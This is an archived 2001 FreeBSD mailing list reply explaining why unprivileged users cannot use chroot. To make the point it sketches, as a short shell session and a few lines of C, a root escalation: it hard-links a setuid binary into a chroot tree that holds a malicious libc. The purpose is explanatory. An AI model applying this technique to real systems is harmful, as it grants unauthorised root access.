Date: Mon, 8 Oct 2001 13:23:20 +0100 From: Mike Bristow <mike@urgle.com> To: Thierry Black <thierryblack@hotmail.com> Cc: freebsd-hackers@freebsd.org Subject: Re: chroot Message-ID: <20011008132320.B52388@lindt.urgle.com> In-Reply-To: <F5avN3qljWwY0VnkB4l000048bc@hotmail.com>; from thierryblack@hotmail.com on Thu, Oct 04, 2001 at 05:32:16PM -0600 References: <F5avN3qljWwY0VnkB4l000048bc@hotmail.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On Thu, Oct 04, 2001 at 05:32:16PM -0600, Thierry Black wrote:
[ please don't write in HTML. Do it again and I'll drop you in a kill file.]
However, to answer the question "why don't we allow users to chroot", I
present you with:
$ mkdir -p hack/usr/lib
$ mkdir -p hack/usr/bin
$ cp evilness.so hack/usr/lib/libc.so
$ ln /usr/bin/at hack/usr/bin
$ cat hack-a-tack.c
#include <unistd.h>
int main (void) { chroot("hack"); exec ("/usr/bin/at", "/usr/bin/at", NULL);}
$ gcc -o hack-a-tack hack-a-tack.c
$ ./hack-a-tack
Now, code I wrote is running with root privilages. While it's
clearly running in a chrooted enviroment, you can still do
Very Bad Things.
(This, of course, assumes that you have write permissions somewhere
on the same file system as a suid program. This is probably true
on many systems)
--
Mike Bristow, seebitwopie
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011008132320.B52388>